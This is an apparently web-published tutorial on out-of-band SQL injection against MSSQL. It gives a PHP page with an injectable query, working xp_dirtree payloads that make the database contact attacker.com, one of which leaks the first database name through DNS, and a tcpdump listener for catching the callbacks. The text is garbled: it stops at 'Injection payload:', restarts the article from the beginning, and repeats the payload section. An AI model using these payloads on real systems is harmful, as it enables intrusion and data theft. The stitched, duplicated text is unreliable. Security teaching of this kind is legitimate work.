Out of Band SQL Injection
Normally in SQL Injection, the attacker:
Sees direct errors, or
Infers information through page behavior or timing.
But Out-of-Band SQL Injection is different:
OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.
This is useful when:
Errors are hidden,
No differences in page behavior,
No timing differences.
Example:
The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.
How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:
Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:
Force a DNS lookup
Trigger an HTTP request
Leak data through those requests.
Real-World Example Setup Imagine a PHP page like:
<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "Product Name: " . $row['name'];
}
?>
Problems:
User input is directly injected into SQL
No output-based or time-based feedback
Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.
Injection payload:
What is Out-of-Band (OOB) SQL Injection? Normally in SQL Injection, the attacker:
Sees direct errors, or
Infers information through page behavior or timing.
But Out-of-Band SQL Injection is different:
OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.
This is useful when:
Errors are hidden,
No differences in page behavior,
No timing differences.
Example:
The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.
How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:
Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:
Force a DNS lookup
Trigger an HTTP request
Leak data through those requests.
Real-World Example Setup Imagine a PHP page like:
<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "Product Name: " . $row['name'];
}
?>
User input is directly injected into SQL
No output-based or time-based feedback
Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.
Injection payload:
'; EXEC master..xp_dirtree '\\attacker.com\test' --
Full URL:
http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--
What happens?
The database server tries to list the contents of the share \attacker.com\test
A DNS lookup happens for attacker.com
The attacker sees the request and knows the SQL injection worked!
Another Example: Leaking Data You can even exfiltrate data!
Example payload:
'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --
If the first database name is 'testdb', the database server will try to access:
testdb.attacker.com
If you monitor your domain’s DNS logs, you can see the database name!
Setting Up the Attacker's Server You need to set up:
A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)
Or a web server to catch HTTP requests.
Simple using tcpdump to catch DNS:
sudo tcpdump -i eth0 port 53
Or use public services like:
Interactsh (by Project Discovery)
Burp Collaborator client
They give you a domain like random.oastify.com, and log incoming requests.
'; EXEC master..xp_dirtree '\\attacker.com\test' --
Full URL:
http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--
What happens?
The database server tries to list the contents of the share \attacker.com\test
A DNS lookup happens for attacker.com
The attacker sees the request and knows the SQL injection worked!
Another Example: Leaking Data You can even exfiltrate data!
Example payload:
'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --
If the first database name is 'testdb', the database server will try to access:
testdb.attacker.com
If you monitor your domain’s DNS logs, you can see the database name!
Setting Up the Attacker's Server You need to set up:
A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)
Or a web server to catch HTTP requests.
Simple using tcpdump to catch DNS:
sudo tcpdump -i eth0 port 53
Or use public services like:
Interactsh (by Project Discovery)
Burp Collaborator client
They give you a domain like random.oastify.com, and log incoming requests.